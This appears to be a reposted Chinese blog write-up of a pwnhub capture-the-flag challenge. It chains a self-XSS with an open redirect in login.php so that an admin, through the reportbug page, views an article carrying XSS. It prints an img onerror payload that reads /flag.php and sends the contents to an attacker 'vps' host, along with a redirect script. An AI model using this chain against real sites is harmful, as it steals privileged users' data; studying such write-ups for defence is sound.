pwnhub_WTP攻击思路--self-xss高级利用 - 代码天地

pwnhub_WTP攻击思路--self-xss高级利用

其他 2018-07-01 11:44:33 阅读次数: 0

self-xss+302跳转构造csrf的利用:

1、login.php 存在跳转
2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html
通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章
c.html是<img src=1 onerror=document.location=//vps+escape($.ajax({url: '/flag.php', async: 0}).responseText) >
3、有一个reportbug，可以让管理员看提交过的页面
4、http://54.223.108.205:23333/view.php?id=MTU2MTg3 查看文章
以上是管理员已经写好有xss的文章了，让他访问就可以了。
在reportbug提交
http://54.223.108.205:23333/login.php?redirecturl=//vps/c1.html
c1.html的内容重定向让查看文章
<script>
location="http://54.223.108.205:23333/view.php?id=MTU2MTg3";
</script>

参考文章：

https://lorexxar.cn/2016/12/10/pwnhub-WTF-writeup/

http://www.venenof.com/index.php/archives/187/

https://www.cnblogs.com/iamstudy/articles/pwnhub_wtf_writeup.html

猜你喜欢

转载自www.cnblogs.com/afanti/p/9249649.html

pwnhub_WTP攻击思路--self-xss高级利用

实战：盒子的self-xss（盒子已忽略）

XSS实战攻击思路总结

java web 利用filter 防止 Xss 攻击

XSS（跨站脚本攻击）原理与利用

利用CSRF或XSS攻击网站的例子

xss防御之php利用httponly防xss攻击

XSS攻击

XSS 攻击

XSS跨站脚本攻击之XSS安全防御思路

java web 利用filter 防止 Xss 攻击（1）

xss跨站攻击详讲 | 如何利用xss拿下一个站？

什么是XSS攻击？如何防范XSS攻击？

网络攻击-XSS攻击详解

XSS攻击与CSRF攻击与防御

前端攻击-xss攻击防御

PHP防XSS攻击

xss攻击原理

防XSS攻击

xss攻击与防御

XSS攻击过滤处理

XSS攻击预防

htmlspecialchars 防止XSS攻击

JavaWeb XSS攻击防御

Django过滤xss攻击

防xss攻击总结

XSS攻击与SQL注入

XSS攻击入门

过滤 xss攻击

XSS攻击及防御

今日推荐

周排行

成为C++高手之宏与枚举

在CAD二次开发中使用进度条

Js插件ECharts，HighCharts学习网址整理

Celery提交任务出错(on windows.)

cephfs内核客户端性能追踪

thinkphp中PHPExcel用法

EntityFramework动态组合多排序字段

汇编语言（八）实验9 根据材料编程

安装ubuntu后必须做的事情（对我而言）

JS函数式编程

每日归档

更多

2024-10-22(0)

2024-10-21(0)

2024-10-20(0)

2024-10-19(0)

2024-10-18(0)

2024-10-17(0)

2024-10-16(0)

2024-10-15(0)

2024-10-14(0)

2024-10-13(0)